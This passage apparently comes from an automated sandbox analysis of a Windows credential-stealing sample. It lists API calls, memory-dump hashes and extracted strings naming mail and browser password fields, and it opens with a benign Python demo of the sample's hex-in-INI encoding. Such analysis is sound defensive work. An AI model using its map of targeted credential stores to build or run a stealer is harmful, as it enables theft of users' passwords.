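The function above builds its value through subcall 004075CD, which formats one byte at a time with sprintf("%2.2X ") and copies the three resulting characters, stores the string with WritePrivateProfileStringA, and later reads it back with GetPrivateProfileStringA into a buffer of nSize 00002000. GetPrivateProfileStringA returns at most nSize-1 characters, so a value longer than 8191 characters (2730 encoded bytes) comes back cut short, with no error to the caller. The Python below is an editor-added example, not code from the report or from the analysed sample: it reproduces the per-byte encoding, decodes it back, and shows the read-back limit. The section name, key name and payload are constructed for illustration, and the two profile helpers only mimic the Win32 behaviour that matters here (overwrite on write, nSize-1 characters on read).

```python
"""Round trip of a byte buffer through the "%2.2X " per-byte encoding and the
private-profile (INI) calls listed in the report.  Editor-added example; not
code from the report or from the analysed sample.  The per-byte format and the
3-byte copy come from subcall 004075CD and the 0x2000 buffer from the
GetPrivateProfileStringA call; section, key, payload and the INI emulation are
constructed for illustration."""
import re
from typing import Dict

PROFILE_BUFFER_SIZE = 0x2000   # nSize passed to GetPrivateProfileStringA in the report

Ini = Dict[str, Dict[str, str]]


def encode_hex_spaced(data: bytes) -> str:
    """sprintf("%2.2X ", byte) for every byte; each 3-character result is appended in order."""
    return "".join("%2.2X " % b for b in data)


def decode_hex_spaced(text: str) -> bytes:
    """Inverse of encode_hex_spaced.  A lone trailing hex digit is tolerated because a
    buffer-limited read can cut the last token in half; any other non-hex token is an error."""
    out = bytearray()
    tokens = text.split()
    for i, tok in enumerate(tokens):
        if re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            out.append(int(tok, 16))
        elif i == len(tokens) - 1 and re.fullmatch(r"[0-9A-Fa-f]", tok):
            break
        else:
            raise ValueError("invalid hex token %r" % tok)
    return bytes(out)


def write_private_profile_string(ini: Ini, section: str, key: str, value: str) -> None:
    """WritePrivateProfileStringA: create the section/key if missing, else overwrite."""
    ini.setdefault(section, {})[key] = value


def get_private_profile_string(ini: Ini, section: str, key: str,
                               default: str = "", nsize: int = PROFILE_BUFFER_SIZE) -> str:
    """GetPrivateProfileStringA: the caller's buffer holds nsize-1 characters plus the
    terminator, so a longer stored value is silently truncated on read."""
    value = ini.get(section, {}).get(key, default)
    return value[:max(nsize - 1, 0)]


def render_ini(ini: Ini) -> str:
    """On-disk form the profile API produces: [section] headers and key=value lines."""
    lines = []
    for section, entries in ini.items():
        lines.append("[%s]" % section)
        lines.extend("%s=%s" % kv for kv in entries.items())
    return "\n".join(lines) + "\n"


def max_roundtrip_bytes(nsize: int = PROFILE_BUFFER_SIZE) -> int:
    """Largest payload whose encoding is read back intact through an nsize buffer."""
    return (nsize - 1) // 3


def roundtrip(data: bytes, nsize: int = PROFILE_BUFFER_SIZE) -> bytes:
    """Encode, store under a constructed section/key, read back with the buffer limit, decode."""
    ini: Ini = {}
    write_private_profile_string(ini, "Settings", "blob", encode_hex_spaced(data))
    return decode_hex_spaced(get_private_profile_string(ini, "Settings", "blob", nsize=nsize))


if __name__ == "__main__":
    print(repr(encode_hex_spaced(b"\x01\xab\xff")))   # '01 AB FF ' (note the trailing space)
    print(max_roundtrip_bytes())                        # 2730
    print(len(roundtrip(b"\xaa" * 2731)))               # 2730: the last byte is lost to the buffer limit
```

When recovering data from an INI written by this code, treat a value of exactly 8191 characters as a sign that the stored payload was longer than what the reading side could see, and decode from the file itself rather than from a buffer-limited read.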

APIs
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
• Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
• Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
• Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

APIs
• ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408D5C
• ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408D7A
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408D98
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408DA8
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
• Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09

APIs
• malloc.MSVCRT ref: 00406F4C
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,761F0A60,00407A43,00000001,?,00000000,761F0A60,00407DBD,00000000,?,?), ref: 00406F64
• free.MSVCRT ref: 00406F6D
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
• Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
• Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
• Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8

APIs
  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
• CreateFontIndirectA.GDI32(?), ref: 004070A6
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: CreateFontIndirect_mbscpymemset
• String ID: Arial
                                                                                                                                                                                    • API String ID: 3853255127-493054409
                                                                                                                                                                                    • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                    • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                                                    • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                    • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
APIs
• FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
• Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
• Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
• Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
APIs
• RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
• Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
• Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
• Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
APIs
• GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
• Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
• Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
• Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
• GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
• GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
• GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
• GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
• GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
• GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
• GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
• GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
• API String ID: 2238633743-192783356
• Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
• Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: PrivateProfileString_mbscmpstrlen
• String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
• API String ID: 3963849919-1658304561
• Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
• Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
• Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
• Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ??2@??3@memcpymemset
• String ID: (yE$(yE$(yE
• API String ID: 1865533344-362086290
• Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
• Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
• Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
• Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
APIs
• memset.MSVCRT ref: 0040EBD8
  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
• memset.MSVCRT ref: 0040EC2B
• memset.MSVCRT ref: 0040EC47
• MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
• memset.MSVCRT ref: 0040ECDD
• memset.MSVCRT ref: 0040ECF2
• _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
• _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
• _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
• _mbscpy.MSVCRT(?,?), ref: 0040ED9B
• _mbscpy.MSVCRT(?,?), ref: 0040EDB1
• _mbscpy.MSVCRT(?,?), ref: 0040EDC7
• memset.MSVCRT ref: 0040EDE1
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$_mbscpy$ByteCharMultiWidestrlen
• String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
• API String ID: 3137614212-1455797042
• Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
• Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
• Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
• Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
APIs
  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
• memset.MSVCRT ref: 0040E5B8
• memset.MSVCRT ref: 0040E5CD
• _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
• _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
• _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
• memset.MSVCRT ref: 0040E6B5
• memset.MSVCRT ref: 0040E6CC
  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
  • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
• memset.MSVCRT ref: 0040E736
• memset.MSVCRT ref: 0040E74F
• sprintf.MSVCRT ref: 0040E76D
• sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
